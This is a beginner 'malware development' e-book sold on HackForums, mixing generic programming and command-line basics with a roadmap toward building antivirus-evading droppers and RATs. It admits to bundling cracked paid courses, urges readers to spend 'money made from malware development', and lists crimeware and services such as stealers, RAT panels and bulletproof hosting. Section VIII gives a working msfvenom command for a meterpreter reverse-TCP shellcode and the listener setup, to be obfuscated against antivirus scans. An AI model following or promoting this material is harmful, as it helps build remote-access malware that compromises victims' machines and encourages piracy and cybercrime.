WtfIsThis - Malware Development EBook For Beginners


Copyright 2022 WtfIsThis. All Rights Reserved.

MALWARE DEVELOPMENT
COURSE FOR BEGINNERS

By WtfIsThis on HackForums

Please do not leak the contents of this course!
WtfIsThis HackForums

Table of Contents
Introduction 03
Acknowledgments 04
Requirements 05
Essentials 06
Abbreviations 24
Malware Overview 25
Testing Environment 27
Write Your First C++ Malware 28
Make Your Dropper More Advanced 29
C++ RATs 30
Courses Order 31
Course Watching Recommendations 32
The End 37

You can always contact me on HackForums at:
https://hackforums.net/member.php?action=profile&uid=5063966
Or in the sales thread:

I. Introduction
This course contains some cracked / non-licensed videos and documents. If you’re kind enough, use some money made from malware development and buy the original courses; I provide them in this course for learning purposes only.

A lot of discussions on malware analysis and automation tooling are already taking place, and every day brings
more. So you might be wondering:
Why another book on the same subject?
- First and foremost, it covers all the basics that will get you into malware programming in ASM/C/C++ or C#.
- Contains a lot of ‘premium’ courses and tutorials for free, that are already vouched for their information, e.g.
sektor7 institute.
- It’s updated weekly with new pages, samples, courses, links and information.
- By purchasing the book you get access to our discord server where you can ask us any question.
! The verification on our server is made manually, it may take a while until a moderator checks your ticket,
please be patient and have screenshots with the contract ready!


II. Acknowledgments
I would like to thank all the readers who purchased the early access versions
of this e-book. Their continued support greatly motivated me to push
onward; without it, this book would never have been finished.
Thank you all for patiently waiting for this release! More interesting updates will come!

Sektor7
For their malware development related courses.
Links:
- RED TEAM Operator: Malware Development Essentials Course
- RED TEAM Operator: Malware Development Intermediate Course
- RED TEAM Operator: Windows Evasion Course
- RED TEAM Operator: Windows Persistence Course

Jose Portilla
- 2022 Complete Python Bootcamp From Zero to Hero in Python

Derek Banas
- C++ Programming Bootcamp

FreeCodeCamp.org
- For their awesome posts

HackerSploit
For his “Windows Privilege Escalation” course on YouTube.
Link: Windows Privilege Escalation

VX-Underground
For their large archive of malware samples and malware source code
Link: Malware Source Code

III. Requirements
What should I know before reading this?

You can be a complete beginner when you buy this package, but it would be a plus if you had:
- A strong will to learn
- Some understanding of operating system architecture
- Some experience with Windows OS
- Basic programming knowledge (C/C#/C++/ASM/Java or even Python would be great)

Hardware needed:
- A computer / laptop
- Internet connection
- Min. 4GB of RAM
- At least 60GB free disk space on your HDD/SSD

Software needed (download tutorials and links available in the next chapters):
- The latest version of VirtualBox / VMware Pro
- Windows 10/11 as your main operating system / at least a virtual machine with it installed (a lot of the tutorials showcase “windows only” applications).
- Visual Studio 2022 (recommended if you’re a beginner) / any other C++ compiler (recommended only if you’re experienced with C/C++ programming). Use VSCodium as an alternative if you’re scared of closed source applications.
- Metasploit (optional if you already have a shellcode ready, but it works on windows and it’s pretty standard), we will mostly use this to generate C format shellcodes and test our ability to obfuscate / hide it from antiviruses (we will bypass static and runtime scans).


IV. Essentials
Where do I start if I am a complete beginner?

Just the thought of learning to code can be very intimidating. The word code is mysterious by definition.
It implies a technical form of communication that computers, and not humans, are meant to understand.
One way many people start learning to code is by picking a popular programming language and
jumping in head first with no direction. This could take the form of an online coding course, a tutorial
project, or a random book purchase on a specific topic.
– freecodecamp.org

This programming roadmap outlines a set of relevant programming concepts, languages, and tools that
almost 100% of malware developers use every day:
1. Familiarize Yourself with Computer Architecture and Data Basics
2. Learn How Programming Languages Work
3. Understand How the Internet Works
4. Practice Some Command-Line Basics
5. Set-up your programming environment
6. Learn the basics of python
7. Switch to C++ (C# is also widely used in malware development, but most of the resources and
tutorials here showcase native malware)

1. Computer Architecture and Data Basics - Part 1

One of the wonderful things about modern programming languages is that they enable us to create
fancy applications without worrying about the nitty-gritty details of the hardware behind the scenes (for
the most part).
This is called abstraction – the ability to work with higher-level tools (in this case programming
languages) that simplify and narrow down the required scope of our understanding and skills.
However, that doesn't mean it's useless to know the basics of the metal that your code is executing on.
At the very least, being aware of a few tidbits will help you navigate workplace conversations about
high CPU and memory usage.
So, here is a bare minimum of computer architecture basics to get you started:
Your computer's most important parts live on microchips (also known as integrated circuits).
Microchips rely on an electrical component called a transistor to function. Transistors are tiny
electrical switches that are either off (0) or on (1) at any given time. A single microchip can contain
millions or billions of tiny transistors embedded on it.
Most modern computers have a microchip called the Central Processing Unit (CPU). You can think of
it as the computer’s brain. It handles most of the number crunching and logical tasks that the computer
performs.
Each CPU has something called an instruction set, which is a collection of binary (zeros and ones)
commands that the CPU understands. Luckily, we don't really need to worry about these as software
devs! That is the power of abstraction.
If the CPU is the logical center of the brain, it is useful to have memory as well to store information
temporarily or for the long term.

1. Computer Architecture and Data Basics - Part 2

Computers have Random Access Memory (RAM) as "working memory" (or short-term memory) to
store information that is actively being used by running programs.
RAM is made up of a collection of memory addresses, which can be used to store bits of data. In older
languages like C, programmers do have access to working directly with memory addresses using a
feature called pointers, but this is rare in more modern languages.
Finally, we'll touch on a component you're surely familiar with – the hard drive. In our analogy of the
brain, this represents long-term memory. A hard drive is an internal or external device that stores data
that should persist even after the computer is turned off.
Before moving on to more details about programming languages, let's spend a second talking about data.
But what exactly do we mean by the word data?
At a high level, we think of things like text documents, images, videos, emails, files, and folders. These
are all high-level data structures that we create and save on our computers every day.
But underneath the hood, a computer chip (like a CPU or RAM chip) has no idea what an "image" or a
"video" is.
From a chip’s perspective, all of these structures are stored as long sequences of ones and zeros. These
ones and zeros are called bits.
Bits are commonly stored in a set of eight at a time, known as a byte. A byte is simply a sequence of
eight bits, such as 00000001, 01100110, or 00001111. Representing information in this way is called
a binary representation.

2. Programming Languages

In the previous section, we mentioned that most computers rely on a CPU, and a CPU can understand a
specific set of instructions in the form of ones and zeros. Therefore, we could theoretically write code
that tells the CPU what to do by stringing together long sequences of ones and zeros in a form the CPU
understands. Instructions written in binary form like this are called machine code. Sounds horrible to
work with, doesn't it? Well it probably is, but I wouldn't know since I mostly use higher-level
programming languages like JavaScript, Python, and Java.
A higher-level programming language provides a set of human-readable keywords, statements, and
syntax rules that are much simpler for people to learn, debug, and work with. Programming languages
provide a means of bridging the gap between the way our human brains understand the world and the
way computer brains (CPUs) understand the world. Ultimately, the code that we write needs to be
translated into the binary instructions (machine code) that the CPU understands. Depending on the
language you choose, we say that your code is either compiled or interpreted into machine code
capable of being executed by your CPU. Most programming languages include a program called
a compiler or an interpreter which performs this translation step.
Just to give a few examples – JavaScript and Python are interpreted languages while Java is a compiled
language. Whether a language is compiled or interpreted (or some combination of the two) has
implications for developer convenience, error handling, performance, and other areas, but we won't get
into those details here.
An interesting article that explains the difference between programming languages in malware
development: welcome to the dark side

Here are some of the pros and cons of different programming languages when it comes
to developing your first FUD:

Language             | Difficulty | Portability                   | Scalability | Size     | Performance                           | Detection
---------------------|------------|-------------------------------|-------------|----------|---------------------------------------|------------------------------------------
Python/Ruby          | Easy       | Yes                           | Yes         | Large    | Slow due to too much overhead         | Easy due to too many libraries
Golang               | Medium     | Yes                           | Yes         | Large    | Faster than Python/Ruby               | Medium since not many people write in Go
C# (.NET)            | Medium     | No                            | Yes         | Large    | Slow due to too much library overhead | Hard
C/C++                | Hard       | Yes – due to low level nature | Yes         | Small    | Fast                                  | Hard
Assembly/Shellcoding | Hardest    | Yes                           | No          | Smallest | Fastest                               | Hard

Credits to niiconsulting.com for their “dark side” blog

3. How the Internet Works – Part 1

Whatever type of programming you aspire to do, you'll run into situations where it helps to know how
computers interact with each other. This typically occurs over the Internet.
The Internet is nothing more than a global collection of connected computers. In other words, it is a
global network. Each computer in the network agrees on a set of rules that enable them to talk to each
other. To a computer, "talking" means transferring data.
As we discussed in the previous section, all types of data – web pages, images, videos, emails, and so
on – can all be represented as ones and zeros.
Therefore, you can think of the Internet as a very large set of computers that can transfer ones and zeros
amongst themselves, in a way that preserves the meaning of that data. The Internet is nothing more than
a digital conversation medium.
If the Internet is just a big conversation arena, let’s define the conversation participants.
First, an analogy: most human conversations require at least two participants. In most cases, one person
initiates the conversation and the other person responds, assuming they are both present and available.
In Internet speak, the computer initiating the conversation is called the client. The computer responding
or answering is called the server.
For example, let’s say you open a web browser and go to "www.google.com". In this scenario, your
web browser is the client. By extension, you can also think of the computer you are working on as the
client.
In a more abstract sense, YOU are the client because you are the one initiating the conversation.

3. How the Internet Works – Part 2

By typing "www.google.com" into the search bar and clicking <ENTER>, your browser is requesting
to start a conversation with one of Google’s computers. Google’s computer is called the server. It
responds by sending the data required to display Google’s web page in your browser. And voilà!
Google’s web page appears in front of your eyes. All Internet data transfers utilize this sort of
client/server relationship.
Later in this chapter you will learn server-side and client-side programming, how sockets work in C,
how to create our own client and server, etc. It will be fun, believe me, but for now, let’s jump to the
next important part: Networking Fundamentals, for that I recommend: Network Direction

It’s not necessary to watch the entire playlist, but make sure you watched at least:
“Introduction to networking” – part 1
“How IP addresses work” – part 4
“IP addressing in depth” – part 5
“TCP/IP Model (internet protocol suite)” – part 6
“How TCP and UDP work” – part 7
“Establishing connections with TCP’s three way handshake” – part 8
“How TCP handles errors and uses windows” – part 9

4. Command-Line Basics – Part 1

The Command Line can be intimidating at first glance. It is often featured in movies as a cryptic black
screen with incomprehensible text, numbers, and symbols scrolling by. It is usually associated with an
evil hacker or genius techie sidekick.
The truth is that it doesn’t take a genius to use or understand the command line. In fact, it allows us to
perform many of the same tasks that we are comfortable doing via a point-and-click mouse.
The main difference is that it primarily accepts input via the keyboard, which can speed up inputs
significantly once you get the hang of it.
You can use the Command Line to browse through folders, list a folder’s contents, create new folders,
copy and move files, delete files, execute programs, and much more. The window in which you can
type commands on the Command Line is called a terminal.
Let's walk through a short tutorial of basic navigation commands that will give you a feel for working
on the command line.
Once you open your terminal, a typical first question is "Where am I"? We can use the “pwd” command
(which stands for "Print Working Directory") to figure that out. It outputs our current location in the file
system which tells us which folder we are currently in.

Now, let’s try for ourselves.

!! Skip the next 3 slides if you are using windows !!

4. Command-Line Basics – Part 2

If you’re on a Mac, open the Terminal app, which is essentially a Unix Command Line terminal.
If you’re running an operating system without a GUI (Graphical User Interface), like Linux or Unix, you
should be at the Command Line by default when you start the computer. If your flavor of Linux or Unix
does have a GUI, you’ll need to open the terminal manually.
At the prompt, type pwd and press <ENTER>. The Command Line will print out the path to the folder
that you’re currently in.
By default, the active folder when opening the Command Line is the logged-in user’s home directory.
This is customizable in case you want the convenience of starting in a different location.
For convenience, the home directory can be referenced using the tilde ~ character. We will use this in a
few examples going forward.
Now that we know what folder we’re in, we can use the ls command to list the contents of the current
directory. The ls command stands for "List".
Type ls and press <ENTER>. The contents (files and subfolders) that reside in the current directory are
printed to the screen.
Rerun the previous command like this ls -al and press <ENTER>. Now we will get more details about
the directory contents, including file sizes, modification dates, and file permissions.
The hyphen in the previous command allows us to set certain flags that modify the behavior of the
command. In this case we added the -a flag which will list all directory contents (including hidden files)
as well as the -l flag which displays the extra file details.

4. Command-Line Basics – Part 3

Next, we can create a new folder using the mkdir command, which stands for "Make Directory". Below
we create a new folder called "testdir".
To create multiple nested directories at once, use the -p flag to create a whole chain of directories like
this: mkdir -p directory1/directory2/directory3
The Command Line isn’t that useful if we can only stay in one location, so let’s learn how to browse
through different directories in the file system. We can do this via the cd command, which stands for
"Change Directory".
First, type cd testdir and press <ENTER>. Then type pwd and press <ENTER>. Note the output now
shows that we are inside the "testdir" directory specified in the cd command. We browsed into it!
Type cd .. and press <ENTER>. The .. tells the Command Line to browse backwards to the parent
directory.
Then type pwd and press <ENTER>. Note the output now shows that you are back in the original
directory. We browsed backwards!
Next we’ll learn how to create a new empty file in the current directory.
Type touch newfile1.txt and press <ENTER>. You can use the ls command to see that the new file was
created in the current directory.
Now we’ll copy that file from one folder to another using the cp command.
Type cp newfile1.txt testdir and press <ENTER>. Now use the ls and ls testdir commands to see that
the new file still exists in the current directory and was copied to the "testdir" directory.

4. Command-Line Basics – Part 4

We can also move files instead of copying using the mv command.
Type touch newfile2.txt and press <ENTER> to create a new file.
Next, type mv newfile2.txt testdir and press <ENTER> to move the file into the "testdir" folder.
Use the ls and ls testdir commands to confirm that the file has been moved into the "testdir" folder (it
should no longer appear in the original location you created it, since it was moved not copied).
The mv command can also be used to rename files.
To do that, type touch newfile3.txt and press <ENTER> to create a new file. Then type mv newfile3.txt
cheese.txt and press <ENTER> to update the file’s name. Use ls to confirm that the file was renamed.
Finally, we can delete files and folders using the rm command.
Type rm cheese.txt and press <ENTER> to remove the file. Use ls to confirm the file was removed.
Type rm -rf testdir and press <ENTER> to remove the "testdir" directory and its contents. Use ls to
confirm the directory was removed.
Note that the -r flag is needed when removing directories: it removes the folder and all of its contents
recursively. The -f flag forces the removal without asking for confirmation.

4. Command-Line Basics – Part 5

If you are a windows user, here are some of the most important command prompt commands:

cmd command   Description
call          calls a batch file from another one
cd            change directory
cls           clear screen
cmd           start command prompt
color         change console color
date          show/set date
dir           list directory content
echo          text output
exit          exits the command prompt or a batch file
find          find files
hostname      display host name
pause         pauses the execution of a batch file and shows a message
runas         start a program as another user
shutdown      shutdown the computer
sort          sort the screen output
start         start an own window to execute a program or command

4. Command-Line Basics – Part 6

cmd command   Description
ftp           transfer files to a FTP server
ftype         display file type and mapping
getmac        display MAC address
ipconfig      display IP network settings
netsh         configure/control/display network components
netstat       display TCP/IP connections and status
nslookup      query the DNS
pathping      test the connection to a specific IP address
ping          pings the network
route         display network routing table, add static routes
systeminfo    displays computer-specific properties and configurations
telnet        establish Telnet connection
tftp          transfer files to a TFTP server
tracert       trace routes similar to pathping
taskkill      terminate a process or an application
tasklist      display applications and related tasks
time          display/edit the system time
timeout       wait for a given amount of time

4. Command-Line Basics – Part 7

cmd command   Description
attrib        display file attributes
comp          compare file contents
compact       display/change file compression
copy / xcopy  copy files
diskcomp      compare content of two floppy disks
diskcopy      copy floppy disc to another one
erase / del   delete one or more files
expand        extract files
fc            compare files and display the differences
mkdir         create a new directory
move          move/rename files
rename        rename files
replace       replace files
rmdir / rd    delete directory
tree          display folder structure graphically
type          display content of text files

4. Command-Line Basics – Part 8

cmd command   Description
chkdsk        check volumes
chkntfs       display/change volume check at startup
defrag        defragment media
diskpart      volume management
driverquery   display installed devices and their properties
format        format volumes
label         change volume name
mode          configure interfaces/devices
mountvol      assign/delete drive mountpoints
verify        monitoring whether volumes are written correctly
vol           show volume description and serial numbers of the HDDs
for           for loop
gpresult      display group policies
gpupdate      update group policies
perfmon       start performance monitor
prompt        change command prompt
reg           add/read/import/export registry entries

5. Programming Environment

If you are interested, here is a quick read about what a programming environment is:
https://themanifest.com/software-development/blog/programming-engineer

Anyway, if you’re a beginner, I recommend downloading Visual Studio Community with the following components:
- Develop Python Applications
- Develop C++ Applications

You can use Visual Studio Code (or Codium, an open source alternative) as well for writing Python / C++ code, but I think Visual Studio is more intuitive (no need to select your compiler / write commands to compile your project, etc.)

And you’re done with all the boring stuff! You can finally start learning a programming language!


6. Basics of Python
Where do I start if I am a complete
beginner?

“Malware Development is essentially just programming for a very niche purpose, to infect systems (with
consent of course). In a red team / pentest manner, this typically is done with the goal to establish a C2
(Command and Control) session within a target organization. While malware is typically written
exclusively in compiled languages such as C/C++, C#, Nim, GOlang, etc. It is not necessarily required to
start off learning those languages. Personally, I would recommend learning programming with a language
like Python as its simplicity allows you to easily digest and understand topics in programming that can be
translated to lower level languages such as C/C++.” - makosec

Here are some resources to get started in Python:
- Python Bootcamp From Zero to Hero in Python (Recommended)
- learnpython.org
- pythonforbeginners.com

7. Learn C++

Once you have a solid foundation in general programming knowledge, you will need to understand
some aspects of programming that Python simply doesn’t teach. For example, you will have to
understand allocating / managing memory and data types such as pointers. This is where it is best to
become acquainted with some C# or C++. Keep in mind you don’t have to aim to be an expert in
programming with C# or C++ to write malware with those languages; however, a basic understanding is
necessary!

Here are some resources to learn C++:
- C++ Programming Bootcamp (Recommended)
- freecodecamp.org website / freecodecamp.org YouTube course
- cplusplus.com
- w3schools.com

Pointers, memory allocation and some other features that we will use:
- Pointers
- Memory Allocation
- Character Sequence
- char*, std::string and char[]
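The program below is an added example (it is not code from the e-book or from any of the courses it links) that puts the four items above in one place: a fixed char[] on the stack, a char* to memory allocated with new[] and released with delete[], a std::string that manages its own storage, and pointer arithmetic over a byte sequence. It also shows the one edge case that matters most when you start handling raw buffers: copying into a fixed array without checking its size. All function and variable names are my own.

```cpp
#include <cstddef>
#include <cstring>
#include <iostream>
#include <string>

// Added example, not from the e-book: the character-sequence forms listed
// above (char[], char*, std::string), heap allocation through a pointer, and
// a bounded copy that respects the destination size. All names are my own.

// A fixed-size array on the stack owns its bytes. sizeof reports the
// capacity of the array, not the length of the text stored in it.
std::size_t stack_buffer_capacity() {
    char greeting[16] = "hello";   // 'h','e','l','l','o','\0', rest zeroed
    return sizeof(greeting);       // 16, however long the text is
}

// A char* is only an address. Memory reached through it must be sized and
// freed by the programmer; std::strlen finds the end by scanning for '\0'.
std::size_t heap_copy_length(const char* src) {
    std::size_t len = std::strlen(src);
    char* copy = new char[len + 1];   // +1 for the terminating NUL
    std::memcpy(copy, src, len + 1);
    std::size_t n = std::strlen(copy);
    delete[] copy;                    // omit this and the block leaks
    return n;
}

// std::string owns and grows its own storage, so the size travels with
// the data and there is no fixed buffer to overrun on append.
std::string string_append(std::string base, const char* extra) {
    base += extra;
    return base;
}

// Pointer arithmetic: walk a byte sequence by address until the NUL.
// Works on any of the three forms once a char* to the first byte exists
// (array name, heap pointer, or std::string::c_str()).
std::size_t count_byte(const char* p, char target) {
    std::size_t n = 0;
    for (; *p != '\0'; ++p)
        if (*p == target) ++n;
    return n;
}

// Copying into a fixed array: the usual defect is ignoring the destination
// size. This version refuses input that would not fit, NUL included.
bool safe_copy(char* dst, std::size_t dst_size, const char* src) {
    std::size_t len = std::strlen(src);
    if (dst_size == 0 || len >= dst_size) return false;   // would overrun
    std::memcpy(dst, src, len + 1);
    return true;
}

// Exercises safe_copy on an 8-byte array: 7 characters fit, 8 do not,
// and the rejected copy leaves the previous contents untouched.
bool safe_copy_demo() {
    char buf[8];
    bool fits = safe_copy(buf, sizeof(buf), "1234567");
    bool rejected = !safe_copy(buf, sizeof(buf), "12345678");
    return fits && rejected && std::strcmp(buf, "1234567") == 0;
}

int main() {
    std::string s = string_append("mal", "ware");
    std::cout << "capacity=" << stack_buffer_capacity()
              << " heap_len=" << heap_copy_length("hello")
              << " string=" << s
              << " a_count=" << count_byte(s.c_str(), 'a')
              << " safe_copy_ok=" << std::boolalpha << safe_copy_demo() << '\n';
    return 0;
}
```

The point to take from safe_copy is that a char* carries no length: whoever writes through it has to know the destination size, which is exactly what std::string and a sizeof on a local array give you for free.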


V. Abbreviations
CPP - C Plus Plus
PY - Python
C# - C-Sharp
ASM - Assembly Language
AES - Advanced Encryption Standard
XOR - Exclusive Or
BSoD - Blue Screen of Death
C&C - Command and Control
RTS - Runtime Scan
AV - Antivirus Software
UAC - User Account Control
DoS - denial of service
DDoS - distributed denial of service
BCD - Boot Configuration Data
BDS - Boot Device Selection
BIOS - Basic Input/Output System
UEFI - Unified Extensible Firmware Interface
DLL - Dynamic-Link Library
EXE - Executable Program
DXE - Driver Execution Environment
PoC - Proof of Concept
PPI - Pay-Per-Install
UID - Unique Identifier
RAT - Remote Access Tool
BOTNET - Robot Network
VM - Virtual Machine
VPS - Virtual Private Server
RDP - Remote Desktop Protocol


VI. Malware Overview


The most common types of malware include worms, ransomware, RATs / botnets, trojans, adware &
spyware, stealers, crypto miners and rootkits.

Malware categories explained: Chad Russel (Recommended)

Classification Methods:
A. Propagation Methods
- Worms
- Trojans

B. Concealment Methods
- Loaders
- Droppers
- Packers / Crypters
- Rootkits
- RATs
- Metamorphic viruses

C. Payload
- Ransomware
- Botnets
- Stealers
- Crypto Miners
- Keyloggers
- Adware

D. Targets
- File Infectors (“overview”)
- Macro Viruses (Microsoft, Excel, etc.)
- Boot sector viruses
- Kernel viruses

E. Malware Creation Tools / Crimeware
- Crypto Miner Panels (ex: Pure Miner)
- Loaders (ex: ICEX)
- Stealers (ex: Raccoon Stealer; the project has been discontinued)
- RAT Panels (ex: BitRAT / VenomRAT)
- Botnet Panels (ex: XLoader)
- Crypting / Packing services (ex: Pure Crypter)
- Keyloggers (ex: Atom Logger)
- RaaS

F. Services
- Spreading Methods and E-Books (ex: “Make real money with botnet”)
- Anonymous / Bulletproof Hosting (ex: CrazyRDP)
- RAT Setup (ex: Odinsmokesbowls; thread closed)
- PPI Botshops (ex: Zelos Loads)

VII. Testing Environment

Setting up your testing environment will be pretty easy, all you need installed on your main computer is:
- Virtual Box / VMWare PRO
- Metasploit for Windows (click here for direct download)
- Windows 10 ISO file (blog tutorial / video tutorial)

Recommendations:
- If you don’t know how to install your VM, watch these tutorials:
VirtualBox Tutorial / VMWare Tutorial
- Give your Windows 10 VM at least 30GB of disk space, 2 CPUs and 3GB of RAM

VM Software (download the following software on your VM):


- Guest Additions (VirtualBox Only!)
- PE Bear
- ResHacker
- Process Hacker
- X64dbg
- Procmon
- RTO-MalDev (drag and drop)
- RTO-MDI (drag and drop)
- RTO-Pers (drag and drop)

! In the next update, I will create a premade windows 10 VM with all the necessary tools, but you can still
make your own (+ custom tools, like IDA) until then.

! If you want to use the VM from RTO, you can install it from: here (sektor7’s official website)

VIII. Your first C++ malware

For your first C++ malware, I recommend watching Malware Development Essentials Course. For the
shellcode that you will execute, you can use calc.bin / msgbox.bin (the architecture depends on your
Windows VM, if you are not sure, run “systeminfo” and check system type :D ).

Path
If you want something more complex from the beginning, you can generate a payload with Metasploit.
Go to Your-Metasploit-Path/bin (ex: Metasploit-Framework/bin), open a CMD and use “cd /d
path/to/metasploit/bin” to navigate to the right folder.

Shellcode
Use msfvenom to generate your payload and add “-f c” at the end to output a C format string. For
example, if I wanted to generate a reverse TCP payload on the IP “$IP” and port “$PORT” I would use:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -f c
and I would copy-paste the result into my C++ application.
! To get my $IP I used “ipconfig” in the cmd and copied my IPv4 Address (local test)
! I think the default msf port is 4444 (you may need to port forward)

Server
Use “msfconsole” to run metasploit. In my case, I would then select the generic payload handler by typing
“use multi/handler” and set the payload by typing “set payload windows/meterpreter/reverse_tcp”. I will
use “show options” to see what information I have to fill up. My LHOST is empty, so I have to use
“set LHOST $IP” to specify my server’s IP, then I will type “exploit” to start listening to any incoming
connection.

IX. Make your Dropper more advanced

Code Injection / API Hooking
Learn from: Malware Development Intermediate Course by Sektor7

Avoid Modern Endpoint Protection
Learn from: Windows Evasion Course by Sektor7

Add Persistence
Learn from: Windows Persistence Course by Sektor7

Escalate Privileges
Learn from: Windows Privilege Escalation Course by HackerSploit

! Please watch the courses in the order suggested here

X. C++ RATs
In the next updates, you will learn how to:
- Create your own RAT: client & server with basic features / functionalities
- Transform it into “shellcode” and obfuscate it with the loader you have already made

Courses Order
What is the right order for the courses?

If you don’t want to read the e-book and view the courses simultaneously, this is the right watch order:

1. Python Bootcamp From Zero to Hero in Python ( $75 )
2. C++ Programming Bootcamp ( $15 )
3. RED TEAM Operator - Malware Development Essentials Course ( $199 )
4. RED TEAM Operator - Malware Development Intermediate Course ( $229 )
5. RED TEAM Operator - Windows Evasion Course ( $239 )
6. RED TEAM Operator - Windows Persistence Course ( $239 )
7. Windows Privilege Escalation ( FREE )

Recommendations
Python Bootcamp From Zero to Hero in Python

Recommended:
1. Course Overview
2. Python Setup
3. Python Object and Data Structure Basics
4. Python Comparison Operators
5. Python Statements
6. Methods and Functions
7. Milestone Project – 1
8. Object Oriented Programming
9. Modules and Packages
10. Errors and Exceptions Handling
11. Milestone Project – 2
12. Python Decorators
13. Python Generators
14. Advanced Python Modules

Optional:
15. Web Scraping with Python
16. Working with Images with Python
17. Working with PDFs and Spreadsheet CSV Files
18. Emails with Python
19. Final Capstone Python Project
20. Advanced Python Objects and Data Structures
21. Bonus Material - Introduction to GUIs
22. APPENDIX OLDER PYTHON 2 MATERIAL
23. BONUS SECTION THANK YOU!

Recommendations
C++ Programming Bootcamp

Recommended:
1. Course Introduction
2. Visual Studio Code Installation
3. C++ Basics, Data Types & Math
4. Conditionals, Looping & Math
5. Arrays & Vectors
6. Functions, Pointers & Exception Handling
7. Strings, Custom Functions & Solving Problems
8. Recursion, Overloading & Lambda
9. Object Oriented Programming
10. Polymorphism, Abstract and Overloading
11. Files, Functions as Variables & Headers
12. Templates, Iterators, Pointers & Malloc
13. Threads
14. Containers
15. Regular Expressions
16. Data Structures & Algorithms

Recommendations
Malware Development Essentials Course

Recommended:
1. Intro and Setup (old .ova file installed in the tutorial, use this one instead)
2. Portable Executable
3. Droppers
4. Obfuscation and Hiding
5. Backdoors and Trojans
6. Code Injection
7. Extras
8. Combined Project
9. Summary

Resources:
Main Folder
RTO-MalDev
Assignment.txt

Recommendations
Malware Development Intermediate Course

Recommended:
1. Intro and Setup
2. PE Madness
3. Code Injection
4. Reflective DLLs
5. x86 vs x64
6. Hooking
7. Payload Control via IPC
8. Combined Project
9. Summary

Resources:
Main Folder
RTO-MalDev2.ova
RTO-MDI

Recommendations
Windows Evasion Course

Recommended:
1. Intro
2. Essentials
3. Non-privileged user vector
4. High-privileged user vector
5. Summary

Resources:
Main Folder

Windows Persistence Course

Recommended:
1. Intro
2. Low Privilege Persistence
3. Admin Level Persistence

Resources:
Main Folder
Assignments
RTO-Pers

Last Words
This is the end of this E-Book ! I hope you enjoyed learning, watching the tutorials and
writing malware from scratch. All the sources, videos and books mentioned can be found
in the “/Resources” folder.
If you have any questions or other requests, just ask me on
HackForums.net, WtfIsThis.

THE END
Thank you for choosing this e-book!
New updates will come weekly, with sources, examples and more slides with useful information, please check the e-
book’s hackforums thread!

TOS
This e-book is for learning purposes only, don't do illegal things.
I'm not responsible in any way for what you are doing with this e-book.
The redistribution or copying of this e-book is prohibited.
No refunds.
